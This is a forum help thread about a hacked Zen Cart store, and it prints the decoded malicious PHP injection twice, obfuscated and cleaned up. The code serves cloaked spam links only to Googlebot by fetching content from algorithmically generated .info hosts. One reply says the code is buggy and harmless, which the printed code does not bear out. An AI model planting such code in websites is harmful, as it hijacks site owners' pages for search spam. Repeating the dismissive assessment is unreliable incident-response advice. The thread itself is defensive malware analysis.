[Last Call] Learn how to a build a cloud-first strategyRegister Now

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 645
  • Last Modified:

zen cart store php hacked, need help analyzing code

hello, I'm helping a client with a hacked store. I found an eval(base64_decode so I decoded it myself, and came up with the resulting code. We discovered the code when google cache indicated that it was presenting unsavory links ONLY to the google search indexer and not to normal browsers. I need help analyzing it to understand what else it does and what else needs to be cleaned.

Any help would be greatly appreciated!
//below is the base64 decoded string

$_439ec1cb0f1656c6617f41d88cf94830 = chr(115).chr(117).chr(98).chr(115).chr(116).chr(114);
$_2938297da3b9a834030705b3aa59d93a = chr(109).chr(100).chr(53);
$_ba30428b6c049208a76657c6480b7ddf = chr(102).chr(115).chr(111).chr(99).chr(107).chr(111).chr(112).chr(101).chr(110);
$_ecaa7596b439b9af60cc983b2067fabc = chr(102).chr(112).chr(117).chr(116).chr(115);
$_91588db553ad4b8cc624d1cf6fadf368 = chr(102).chr(103).chr(101).chr(116).chr(115);
$_1d342bc8a8990aae1ed29b52fd51338c = chr(115).chr(116).chr(114).chr(115).chr(116).chr(114);
$_a320eb60651b291ca479f43a8856b73a = chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82);
$_5a672364743eba1bc07363e4bfced05c = $$_a320eb60651b291ca479f43a8856b73a;

if($_1d342bc8a8990aae1ed29b52fd51338c($_5a672364743eba1bc07363e4bfced05c[chr(72).chr(84).chr(84).chr(80).chr(95).chr(85).chr(83).chr(69).chr(82).chr(95).chr(65).chr(71).chr(69).chr(78).chr(84)], chr(71).chr(111).chr(111).chr(103).chr(108).chr(101).chr(98).chr(111).chr(116))) {
 for($_a2efef6c3e0c659266a3612f08e0f219=458567;$_a2efef6c3e0c659266a3612f08e0f219<458575;$_a2efef6c3e0c659266a3612f08e0f219++) {
  $_37aa5f149a6572e7fb03eb18e150c6dc = $_439ec1cb0f1656c6617f41d88cf94830($_2938297da3b9a834030705b3aa59d93a($_a2efef6c3e0c659266a3612f08e0f219), 0, 16) . chr(46).chr(105).chr(110).chr(102).chr(111);
  $_002a8c508b8e2392e60bb9ffeece46c0=$_ba30428b6c049208a76657c6480b7ddf($_37aa5f149a6572e7fb03eb18e150c6dc, chr(56).chr(48));
  if(!$_002a8c508b8e2392e60bb9ffeece46c0) 
   continue;
  $_ecaa7596b439b9af60cc983b2067fabc($_002a8c508b8e2392e60bb9ffeece46c0, chr(71).chr(69).chr(84).chr(32).chr(47).chr(57).chr(100).chr(100).chr(100).chr(102).chr(50).chr(97).chr(52).chr(102).chr(55).chr(100).chr(57).chr(52).chr(53).chr(57).chr(52).chr(101).chr(99).chr(50).chr(101).chr(97).chr(57).chr(56).chr(52).chr(48).chr(55).chr(97).chr(52).chr(49).chr(48).chr(101).chr(49).chr(32).chr(72).chr(84).chr(84).chr(80).chr(47).chr(49).chr(46).chr(49)."\r\n".chr(72).chr(111).chr(115).chr(116).chr(58).chr(32).$_37aa5f149a6572e7fb03eb18e150c6dc."\r\n".chr(82).chr(101).chr(102).chr(101).chr(114).chr(101).chr(114).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47) . $_5a672364743eba1bc07363e4bfced05c[chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(95).chr(78).chr(65).chr(77).chr(69)] . $$_a320eb60651b291ca479f43a8856b73a[chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(95).chr(85).chr(82).chr(73)]."\r\n\r\n");
  $_fc5c9462e5e78a93bde7df3182d2f1ee=0;
  while($_f41b8a7eec9e13339d27d6f86193bdc4 = $_91588db553ad4b8cc624d1cf6fadf368($_002a8c508b8e2392e60bb9ffeece46c0, 1024)) {
   if($_fc5c9462e5e78a93bde7df3182d2f1ee) {
    if($_1d342bc8a8990aae1ed29b52fd51338c($_f41b8a7eec9e13339d27d6f86193bdc4,chr(45).chr(45).chr(45).chr(45).chr(45))){
     break;
    }
    echo($_f41b8a7eec9e13339d27d6f86193bdc4); 
   }
   if($_1d342bc8a8990aae1ed29b52fd51338c($_f41b8a7eec9e13339d27d6f86193bdc4,chr(45).chr(45).chr(45).chr(45).chr(45))) {
    $_fc5c9462e5e78a93bde7df3182d2f1ee=1;
    continue;
   }
  }
  if($_fc5c9462e5e78a93bde7df3182d2f1ee)
   break;
 }
}

Open in new window

0
MeridianManagement
Asked:
MeridianManagement
  • 2
1 Solution
 
CSecurityCommented:
Here is decoded PHP code:

When it finds user agent is GoogleBot, it tries a lot of MD5ed hosts and .info extension to connect, if it connect successfully, it sends URL, Referrer, etc. to that server.

Funny one! Have a lot of bugs, like when it sends HTTP/1.1 request it doesn't put \r\n

Nothing to worry...
if(strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot')) {
 for($i=458567;$i<458575;$i++) {
  $var1 = substr(md5($i), 0, 16).".info";
  $sock=fsockopen($var1, 80);
  if(!$sock)
   continue;
  fputs($sock, "GET /9dddf2a4f7d94594ec2ea98407a410e1 HTTP/1.1 Host: ".$var1."\r\n"."Referer: http://".$_SERVER[SERVER_NAME].$_SERVER['REQUEST_URI']."\r\n\r\n");
  $var2=0;
  while($recv = fgets($sock, 1024)) {
   if($var2) {
    if(strstr($recv,'-----')){
     break;
    }
    echo($recv); 
   }
   if(strstr($recv,'-----')) {
    $var2=1;
    continue;
   }
  }
  if($var2)
   break;
 }
}

Open in new window

0
 
MeridianManagementAuthor Commented:
Thanks for the analysis.

The line that shows /9dddf2a4f7d94594ec2ea98407a410e1 Is that referring to another file on the server?

You're saying it's trying a lot of md5hosts but where is it getting the addresses for these hosts? I'm not sure I understand how you can connect to a host whose address is encrypted with md5.

Do you think there are other areas I need to clean or does this appear to be contained?
0
 
CSecurityCommented:
Look, calculate MD5 of a number, like 4558, assume it's a9438938a889a839 etc. This code tries to connect that string and .info, on port 80.

That /9dddf2a4f7d94594ec2ea98407a410e1 is in hacker's site, yes that file is on that server. As I said, nothing to worry, it's buggy not working code
0

Featured Post

Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

  • 2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now